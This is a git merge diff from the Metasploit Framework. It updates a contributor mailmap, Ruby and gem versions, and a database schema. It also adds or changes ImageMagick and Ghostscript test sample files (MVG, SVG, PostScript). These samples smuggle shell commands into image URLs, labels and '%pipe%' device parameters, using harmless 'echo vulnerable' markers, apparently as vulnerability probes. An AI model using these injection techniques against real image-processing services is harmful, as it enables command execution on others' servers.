Land #7786 , Microsoft Edge constant for HttpClient

Land #7766 , Add Automatic Targeting to all Exploits
Delete extraneous documentation
2017-01-05 21:07:57 -06:00 · 2017-01-05 11:05:53 -06:00 · 2017-01-04 22:44:44 -05:00 · 2017-01-04 22:32:44 -05:00 · 2017-01-04 22:20:42 -05:00 · 2017-01-04 17:02:39 -06:00
631 changed files with 21053 additions and 5484 deletions
@@ -1,58 +1,56 @@
-acammack-r7 <acammack-r7@github>     Adam Cammack <Adam_Cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bcook-r7 <bcook-r7@github>           Brent Cook <bcook@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github> bpatterson-r7 <Brian_Patterson@rapid7.com>
-bturner-r7 <bturner-r7@github>       Brandon Turner <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     Brendan <bwatters@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     Brendan Watters <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     Chris Doughty <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     Deral Heiland <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     David Maloney <DMaloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     David Maloney <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     dmaloney-r7 <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         Erran Carey <e@ipwnstuff.com>
-farias-r7 <farias-r7@github>         Fernando Arias <fernando_arias@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>     Greg Mikeska <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>     Gregory Mikeska <greg_mikeska@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     James Barnett <James_Barnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           Jon Hart <jon_hart@rapid7.com>
-jlee-r7 <jlee-r7@github>             <egypt@metasploit.com> # aka egypt
-jlee-r7 <jlee-r7@github>             <james_lee@rapid7.com>
-kgray-r7 <kgray-r7@github>           Kyle Gray <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         l0gan <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     darkbushido <lance.sanchez@gmail.com>
-lsato-r7 <lsato-r7@github>           Louis Sato <lsato@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         Pearce Barry <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         Scott Davis <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     Samuel Huckins <samuel_huckins@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           tdoan-r7 <thao_doan@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           thao doan <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <todb@metasploit.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <todb@packetfu.com>
+bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
+bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
+egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                 <james_lee@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>       <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
+kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
+tatanus <tatanus@github>             <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             <todb@metasploit.com>
+todb-r7 <todb-r7@github>             <todb@packetfu.com>
 wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               William Vu <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               William Vu <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               William Vu <wvu@metasploit.com>
-wvu-r7 <wvu-r7@github>               wvu-r7 <William_Vu@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           William Webb <William_Webb@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           wwebb-r7 <William_Webb@rapid7.com>
+wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
+wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -66,15 +64,14 @@ bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
+brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
+bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
-Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
-Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
+Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
@@ -85,22 +82,24 @@ crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
+espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
+farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
+FireFart <FireFart@github>             <firefart@gmail.com>
 FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
+gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
+gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
 g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
 g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
+h00die <h00die@github>                 <h00die@users.noreply.github.com>
+h00die <h00die@github>                 <mike@shorebreaksecurity.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
+hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   Josh Abraham <jabra@spl0it.org>
-jabra <jabra@github>                   Joshua Abraham <jabra@spl0it.org>
+jabra <jabra@github>                   <jabra@spl0it.org>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -108,9 +107,9 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
@@ -139,15 +138,20 @@ r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
 rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
+RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
+RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
+rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
+rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
+rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
+stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
@@ -157,10 +161,10 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-void-in <void-in@github>               root <void-in@users.noreply.github.com>
-void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
+void-in <void-in@github>               void-in <root@localhost.localdomain>
+void-in <void-in@github>               <void-in@users.noreply.github.com>
+void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

@@ -1 +1 @@
-2.3.1
+2.3.3
@@ -1,16 +1,17 @@
+dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.3'
+  postgresql: '9.6'
  apt:
    packages:
      - libpcap-dev
      - graphviz
 language: ruby
 rvm:
-  - '2.3.1'
+  - '2.3.3'

 env:
  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.12.30)
+    metasploit-framework (4.13.11)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -14,9 +14,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.1.19)
+      metasploit-payloads (= 1.2.6)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.0.6)
+      metasploit_payloads-mettle (= 0.1.4)
      msgpack
      nessus_rest
      net-ssh
@@ -33,7 +33,7 @@ PATH
      rb-readline-r7
      recog
      redcarpet
-      rex-arch
+      rex-arch (= 0.1.4)
      rex-bin_tools
      rex-core
      rex-encoder
@@ -89,8 +89,9 @@ GEM
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.4.0)
-    arel (6.0.3)
+    addressable (2.5.0)
+      public_suffix (~> 2.0, >= 2.0.2)
+    arel (6.0.4)
    arel-helpers (2.3.0)
      activerecord (>= 3.1.0, < 6)
    aruba (0.14.2)
@@ -103,7 +104,7 @@ GEM
    bcrypt (3.1.11)
    bit-struct (0.15.0)
    builder (3.2.2)
-    capybara (2.9.2)
+    capybara (2.11.0)
      addressable
      mime-types (>= 1.16)
      nokogiri (>= 1.3.3)
@@ -134,12 +135,12 @@ GEM
    diff-lcs (1.2.5)
    docile (1.1.5)
    erubis (2.7.0)
-    factory_girl (4.7.0)
+    factory_girl (4.8.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.7.0)
-      factory_girl (~> 4.7.0)
+    factory_girl_rails (4.8.0)
+      factory_girl (~> 4.8.0)
      railties (>= 3.0.0)
-    faraday (0.9.2)
+    faraday (0.10.1)
      multipart-post (>= 1.2, < 3)
    ffi (1.9.14)
    filesize (0.1.1)
@@ -152,11 +153,11 @@ GEM
    loofah (2.0.3)
      nokogiri (>= 1.5.9)
    metasm (1.0.2)
-    metasploit-concern (2.0.1)
+    metasploit-concern (2.0.3)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.3)
+    metasploit-credential (2.0.8)
      metasploit-concern
      metasploit-model
      metasploit_data_models
@@ -164,12 +165,12 @@ GEM
      railties
      rubyntlm
      rubyzip
-    metasploit-model (2.0.0)
+    metasploit-model (2.0.3)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.1.19)
-    metasploit_data_models (2.0.4)
+    metasploit-payloads (1.2.6)
+    metasploit_data_models (2.0.13)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -179,25 +180,24 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.0.6)
+    metasploit_payloads-mettle (0.1.4)
    method_source (0.8.2)
    mime-types (3.1)
      mime-types-data (~> 3.2015)
    mime-types-data (3.2016.0521)
    mini_portile2 (2.1.0)
-    minitest (5.9.1)
-    msgpack (1.0.0)
+    minitest (5.10.1)
+    msgpack (1.0.2)
    multi_json (1.12.1)
    multi_test (0.1.2)
    multipart-post (2.0.0)
    nessus_rest (0.1.6)
-    net-ssh (3.2.0)
+    net-ssh (4.0.0)
    network_interface (0.0.1)
-    nokogiri (1.6.8)
+    nokogiri (1.7.0.1)
      mini_portile2 (~> 2.1.0)
-      pkg-config (~> 1.1.7)
-    octokit (4.3.0)
-      sawyer (~> 0.7.0, >= 0.5.3)
+    octokit (4.6.2)
+      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.1)
    openvas-omp (0.0.4)
    packetfu (1.1.11)
@@ -207,7 +207,6 @@ GEM
    pcaprub (0.12.4)
    pg (0.19.0)
    pg_array_parser (0.0.9)
-    pkg-config (1.1.7)
    postgres_ext (3.0.0)
      activerecord (>= 4.0.0)
      arel (>= 4.0.1)
@@ -216,14 +215,15 @@ GEM
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
-    rack (1.6.4)
+    public_suffix (2.0.5)
+    rack (1.6.5)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.7)
+    rails-dom-testing (1.0.8)
      activesupport (>= 4.2.0.beta, < 5.0)
-      nokogiri (~> 1.6.0)
+      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
@@ -232,12 +232,12 @@ GEM
      activesupport (= 4.2.7.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (11.3.0)
+    rake (12.0.0)
    rb-readline-r7 (0.5.2.0)
-    recog (2.0.22)
+    recog (2.1.2)
      nokogiri
-    redcarpet (3.3.4)
-    rex-arch (0.1.1)
+    redcarpet (3.4.0)
+    rex-arch (0.1.4)
      rex-text
    rex-bin_tools (0.1.1)
      metasm
@@ -245,42 +245,42 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.2)
-    rex-encoder (0.1.0)
+    rex-core (0.1.5)
+    rex-encoder (0.1.2)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.0)
+    rex-exploitation (0.1.8)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
-    rex-java (0.1.2)
+    rex-java (0.1.3)
    rex-mime (0.1.1)
      rex-text
    rex-nop (0.1.0)
      rex-arch
-    rex-ole (0.1.2)
+    rex-ole (0.1.4)
      rex-text
-    rex-powershell (0.1.66)
+    rex-powershell (0.1.69)
      rex-random_identifier
      rex-text
-    rex-random_identifier (0.1.0)
+    rex-random_identifier (0.1.1)
      rex-text
-    rex-registry (0.1.0)
-    rex-rop_builder (0.1.0)
+    rex-registry (0.1.1)
+    rex-rop_builder (0.1.1)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.0)
+    rex-socket (0.1.2)
      rex-core
-    rex-sslscan (0.1.0)
+    rex-sslscan (0.1.1)
      rex-socket
      rex-text
    rex-struct2 (0.1.0)
-    rex-text (0.2.1)
-    rex-zip (0.1.0)
+    rex-text (0.2.10)
+    rex-zip (0.1.1)
      rex-text
    rkelly-remix (0.0.6)
    robots (0.10.1)
@@ -303,9 +303,9 @@ GEM
    rspec-support (3.5.0)
    rubyntlm (0.6.1)
    rubyzip (1.2.0)
-    sawyer (0.7.0)
-      addressable (>= 2.3.5, < 2.5)
-      faraday (~> 0.8, < 0.10)
+    sawyer (0.8.1)
+      addressable (>= 2.3.5, < 2.6)
+      faraday (~> 0.8, < 1.0)
    shoulda-matchers (3.1.1)
      activesupport (>= 4.0.0)
    simplecov (0.12.0)
@@ -314,14 +314,14 @@ GEM
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.0)
    slop (3.6.0)
-    sqlite3 (1.3.11)
+    sqlite3 (1.3.13)
    sshkey (1.8.0)
-    thor (0.19.1)
+    thor (0.19.4)
    thread_safe (0.3.5)
    timecop (0.8.1)
    tzinfo (1.2.2)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2016.7)
+    tzinfo-data (1.2016.10)
      tzinfo (>= 1.0.0)
    windows_error (0.0.2)
    xpath (2.0.0)
@@ -348,4 +348,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   1.13.2
+   1.13.7
@@ -1,14 +0,0 @@
-id=ImageMagick  version=1.0
-class=DirectClass  colors=0  matte=False
-columns=1  rows=1  depth=16
-colorspace=sRGB
-page=1x1+0+0
-rendering-intent=Perceptual
-gamma=0.454545
-red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
-white-point=0.3127,0.329
-date:create=2016-05-04T00:19:42-05:00
-date:modify=2016-05-04T00:19:42-05:00
-label={";echo vulnerable"}
-
-:ÿÿÿÿÿÿ
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'https://localhost";echo vulnerable"'
+image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
 pop graphic-context
 pop graphic-context
@@ -0,0 +1,4 @@
+%!PS
+currentdevice null true mark /OutputICCProfile (%pipe%echo vulnerable > /dev/tty)
+.putdeviceparams
+quit
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable > /dev/tty&#x22;" />
 </svg>
@@ -1,14 +0,0 @@
-id=ImageMagick  version=1.0
-class=DirectClass  colors=0  matte=False
-columns=1  rows=1  depth=16
-colorspace=sRGB
-page=1x1+0+0
-rendering-intent=Perceptual
-gamma=0.454545
-red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
-white-point=0.3127,0.329
-date:create=2016-05-04T00:19:42-05:00
-date:modify=2016-05-04T00:19:42-05:00
-label={";touch vulnerable"}
-
-:ÿÿÿÿÿÿ
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 '|touch vulnerable'
+image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
 pop graphic-context
 pop graphic-context
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x7c;touch vulnerable" />
+    xlink:href="&#x7c;echo vulnerable > /dev/tty" />
 </svg>
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20160415153312) do
+ActiveRecord::Schema.define(version: 20161227212223) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
@@ -177,6 +177,7 @@ ActiveRecord::Schema.define(version: 20160415153312) do
    t.integer  "exploit_attempt_count",               default: 0
    t.integer  "cred_count",                          default: 0
    t.string   "detected_arch"
+    t.string   "os_family"
  end

  add_index "hosts", ["name"], name: "index_hosts_on_name", using: :btree
@@ -248,12 +249,12 @@ ActiveRecord::Schema.define(version: 20160415153312) do
  add_index "metasploit_credential_cores", ["private_id"], name: "index_metasploit_credential_cores_on_private_id", using: :btree
  add_index "metasploit_credential_cores", ["public_id"], name: "index_metasploit_credential_cores_on_public_id", using: :btree
  add_index "metasploit_credential_cores", ["realm_id"], name: "index_metasploit_credential_cores_on_realm_id", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
